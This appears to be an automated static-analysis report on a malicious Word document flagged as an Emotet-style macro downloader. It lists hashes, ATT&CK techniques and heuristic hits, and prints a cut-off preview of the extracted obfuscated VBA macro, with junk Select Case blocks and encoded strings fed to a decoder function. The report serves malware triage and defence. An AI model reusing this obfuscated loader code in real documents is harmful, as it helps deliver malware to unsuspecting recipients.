Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 098ac787403ec8f8…

MALICIOUS

Office (OLE)

Size: 196.5 KB
Created: 2018-03-28 17:00:00
Authoring application: Microsoft Office Word
First seen: 2019-01-31
MD5: 85fc4b140129c8a834c9d0dcb8b83e65
SHA-1: 01ccf642704c75815641b78453382501dfba96ba
SHA-256: 098ac787403ec8f8bf10b2a7393d9f0edc5cfdd1b2139fdb6c14ab1d194c57e4
Risk Score: 244

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1140 Deobfuscate/Decode Files or Information

The sample is identified as malicious by ClamAV and exhibits multiple high-severity heuristic firings related to VBA macros, including AutoOpen and CreateObject calls. The presence of a VBA macro in 'macros.bas' strongly suggests an attempt to execute malicious code. The macro likely attempts to download and execute a second-stage payload, a common technique for malware distribution.

Heuristics (9)

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 62497 bytes
SHA-256: 96b4404b733f4588c739072e4c446a1f29d2a6e9e91971d7cc4d1a4321ddf6f6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 19 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ApPDzdH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "tUAApGH"
Function RwfZCCWYfwB()
On Error Resume Next
Select Case raFis
      Case 41262
         rsktm = CStr(zWhKk + CStr(83073) - mIpTPG * 88778)
      Case 3890
         SJRqC = BDGJwD
         TIrUHo = Tan(34053 * UYGbki)
End Select
PAbFFmn = OrhuW("CswAxAGUAYQBkADEAYQAzADUAOQAwADAAMgBkADAAYwBjAGUAZABiAGQAMQBlADEAMABmAGQAYQAzAbDVtENk", 3, 76)
Select Case mSlbEc
      Case 51531
         cwQPVi = CStr(bsWDp + CStr(64053) - uzFkow * 69845)
      Case 19749
         SBQRn = XzGsj
         XqZww = Tan(29952 * OEjtDK)
End Select
Select Case LPjPVw
      Case 16950
         tEcDJJ = CStr(NHLzY + CStr(41551) - aShEwi * 91679)
      Case 50306
         pEQri = OUjmK
         SuHwj = Tan(91759 * LIsFKa)
End Select
jbXQcEhR = OrhuW("XLtisJwBmAGQAZABhAGQAMwBkAGQAMwAyADgANAAwAGMAZQBiAGQAOQBkAGYAZQA0ADMANAAxAGEANQAyADQANgAwADgAOABlADYAMABiADQAOQA2ADkANQA2AGMAYQAxADUANwBmADIAOQAzAGYANwA3ADUAOABhAiM", 7, 156)
Select Case NhRzdo
      Case 37321
         mwtSas = CStr(rPmLZI + CStr(46045) - HPjGOO * 95835)
      Case 97802
         QtHhD = IVrlIJ
         RUwSR = Tan(54697 * zBjpH)
End Select
Select Case DwGmhb
      Case 95987
         UWpzwD = CStr(jmShPc + CStr(99812) - pkdTsV * 65369)
      Case 47329
         GXGdj = CFaVz
         iiqQbC = Tan(15417 * jnSDw)
End Select
FVSTzlV = OrhuW("mBiAGQANQA5AGUAYQA2ADAANgAyAGIAYwA1ADUAMgBli3S.m", 2, 42)
Select Case CEHFT
      Case 74461
         QqYzOz = CStr(PboHA + CStr(5487) - BnCRS * 49959)
      Case 32653
         TECjSR = zVCMwO
         RSMDpr = Tan(15449 * LCtHAR)
End Select
Select Case YMZszw
      Case 6360
         mlwzZk = CStr(wOYKr + CStr(39185) - cjzEq * 84165)
      Case 84477
         aECEX = JuiJr
         pJwXK = Tan(99100 * ooQbR)
End Select
vHsOMklrC = OrhuW("U4DkT%345MgB8AG4ATgBrAG0AcQA5AHcAVwB2AEMAMwBIDXX", 7, 39)
Select Case Cjpst
      Case 15731
         zjLsz = CStr(MPoUt + CStr(829) - KjTlc * 88301)
      Case 82082
         DNKckk = YTClB
         LFzFao = Tan(74264 * zUWbQI)
End Select
Select Case jqYqo
      Case 4126
         VZqYY = CStr(SGOpZ + CStr(86736) - sYIkZ * 40234)
      Case 89804
         aXXuN = aDViZ
         FjRmnr = Tan(39767 * jTQGbs)
End Select
pACLiw = OrhuW("Jo5D0AYwBiADAAYQA1ADkAZAA4ADgAYwA5ADAAOQA0ADMAMABkADQAOQA1ADIAZgBiAGUANQA0ADYANwBhAGIAZQA3ADIAMAAyAGUANAA3AGIANwBmADUANwAmfX", 7, 115)
Select Case LinQTH
      Case 5761
         BSiKzs = CStr(tGABR + CStr(18443) - WwhAE * 41764)
      Case 14195
         RSUtO = hSFjC
         PTJjUw = Tan(63587 * JFabV)
End Select
Select Case FIluT
      Case 42907
         qKQkoT = CStr(AjhYzA + CStr(77491) - wjcvY * 59119)
      Case 56566
         jCdtPC = RjqaM
         WMElT = Tan(77249 * OJVWjD)
End Select
fzviw = OrhuW("hhADUAMgAyADkAMABiADEANwA1ADMAZAAwADEAYgA4AGMAZQA3ADEAYwAzADkAYQA5AGEAYQA1ADEAOQA3ADIAOQA2ADIAZgBmADUAMwA0AGUAYwA1AGMAMwA0AGEAOAA1AGQAOQAwADMAMgAynQ,ms30S", 2, 145)
Select Case BSYzE
      Case 24645
         kiLaN = CStr(MQsGZb + CStr(57031) - WXKEqt * 59828)
      Case 43899
         GNLsVw = sWzHm
         sKGqXw = Tan(33941 * zEajf)
End Select
Select Case sPqAX
      Case 27228
         fhNDo = CStr(DvjSQq + CStr(85859) - pniRso * 485)
      Case 65529
         iWYND = GDlXjZ
         jzaKJw = Tan(22200 * zawICc)
End Select
UVbXmT = OrhuW("nTwcANwAxADEAMAA5AGMAMgAxk6PRJO", 4, 22)
Select Case jfZOz
      Case 55830
         hPSAwc = CStr(fSMTH + CStr(8070) - rhfBWX * 60676)
      Case 92083
         EAVuTF = RbFAQK
         IAiSUH = Tan(73071 * uYfszu)
End Select
Select Case imhQB
      Case 94602
         OcAQA = CStr(tNzFiV + CStr(58889) - riEdV * 2361)
      Case 15192
         NdBvKj = TbuDj
         CRDQkw = Tan(54722 * BDphz)
End Select
PChOdamWoZi = Orhu
... (truncated)